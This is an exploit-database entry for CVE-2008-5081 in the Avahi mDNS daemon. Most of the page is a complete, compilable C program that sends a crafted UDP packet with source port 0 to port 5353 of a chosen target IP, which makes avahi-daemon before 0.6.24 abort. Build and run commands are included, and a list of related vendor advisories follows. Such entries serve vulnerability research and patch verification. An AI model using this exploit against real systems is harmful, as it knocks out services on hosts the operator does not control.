Lucene search
RootSSV:66077HistoryJul 01, 2014 - 12:00 a.m.
Avahi < 0.6.24 (mDNS Daemon) Remote Denial of Service Exploit
2014-07-0100:00:00
Root
www.seebug.org
14
0.961 High
EPSS
Percentile
99.3%
No description provided by source.
/*
* cve-2008-5081.c
*
* Avahi mDNS Daemon Remote DoS < 0.6.24
* Jon Oberheide <[email protected]>
* http://jon.oberheide.org
*
* Usage:
*
* gcc cve-2008-5081.c -ldnet -o cve-2008-5081
* ./cve-2008-5081 1.2.3.4
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5081
*
* Crafted mDNS packet with source port 0 can cause avahi-daemon
* to abort() due to failed assertion assert(port > 0); in
* originates_from_local_legacy_unicast_socket() function in
* avahi-core/server.c.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dnet.h>
int
main(int argc, char **argv)
{
ip_t *sock;
intf_t *intf;
struct addr dst;
struct ip_hdr *ip;
struct udp_hdr *udp;
struct intf_entry entry;
int len = IP_HDR_LEN + UDP_HDR_LEN;
char buf[len];
if (argc < 2 || addr_aton(argv[1], &dst)) {
printf("error: please specify a target ip address\n");
return 1;
}
memset(buf, 0, sizeof(buf));
ip = (struct ip_hdr *) buf;
ip->ip_v = 4;
ip->ip_hl = 5;
ip->ip_tos = 0;
ip->ip_off = 0;
ip->ip_sum = 0;
ip->ip_ttl = IP_TTL_MAX;
ip->ip_p = IP_PROTO_UDP;
ip->ip_id = htons(0xdead);
ip->ip_len = htons(len);
udp = (struct udp_hdr *) (buf + IP_HDR_LEN);
udp->uh_sum = 0;
udp->uh_sport = htons(0);
udp->uh_dport = htons(5353);
udp->uh_ulen = htons(UDP_HDR_LEN);
intf = intf_open();
intf_get_dst(intf, &entry, &dst);
intf_close(intf);
ip->ip_src = entry.intf_addr.addr_ip;
ip->ip_dst = dst.addr_ip;
ip_checksum(buf, len);
sock = ip_open();
if (!sock) {
printf("error: root privileges needed for raw socket\n");
return 1;
}
ip_send(sock, buf, len);
ip_close(sock);
return 0;
}
// milw0rm.com [2008-12-19]
Related
openvas
openvas
Fedora Core 10 FEDORA-2008-11351 (avahi)
2009-01-07 00:00:00
RedHat Security Advisory RHSA-2009:0013
2009-01-13 00:00:00
Avahi Denial of Service Vulnerability
2008-12-31 00:00:00
nessus
nessus
Fedora 10 : avahi-0.6.22-12.fc10 (2008-11351)
2009-04-23 00:00:00
Mandriva Linux Security Advisory : avahi (MDVSA-2009:031)
2009-04-23 00:00:00
RHEL 5 : avahi (RHSA-2009:0013)
2009-01-13 00:00:00
oraclelinux
oraclelinux
avahi security update
2009-01-12 00:00:00
fedora
fedora
[SECURITY] Fedora 10 Update: avahi-0.6.22-12.fc10
2009-01-07 09:33:13
cve
cve
CVE-2008-5081
2008-12-17 02:30:00
CVE-2010-2244
2010-07-08 12:54:00
centos
centos
avahi security update
2009-01-14 00:46:56
seebug
seebug
Avahi < 0.6.24 (mDNS Daemon) Remote Denial of Service Exploit
2008-12-21 00:00:00
gentoo
gentoo
Avahi: Denial of service
2009-01-14 00:00:00
prion
prion
Design/Logic Flaw
2008-12-17 02:30:00
Design/Logic Flaw
2010-07-08 12:54:00
redhat
redhat
(RHSA-2009:0013) Moderate: avahi security update
2009-01-12 00:00:00
exploitpack
exploitpack
Avahi 0.6.24 - mDNS Daemon Remote Denial of Service
2008-12-19 00:00:00
securityvulns
securityvulns
Avahi multicast DNS server DoS
2008-12-23 00:00:00
[SECURITY] [DSA 1690-1] New avahi packages fix denial of service
2008-12-23 00:00:00
debiancve
debiancve
CVE-2008-5081
2008-12-17 02:30:00
CVE-2010-2244
2010-07-08 12:54:00
ubuntucve
ubuntucve
CVE-2008-5081
2008-12-17 00:00:00
CVE-2010-2244
2010-07-08 00:00:00
exploitdb
exploitdb
Avahi < 0.6.24 - mDNS Daemon Remote Denial of Service
2008-12-19 00:00:00
osv
osv
avahi - denial of service
2008-12-22 00:00:00
ubuntu
ubuntu
Avahi vulnerabilities
2008-12-18 00:00:00
debian
debian
[SECURITY] [DSA 1690-1] New avahi packages fix denial of service
2008-12-22 06:53:20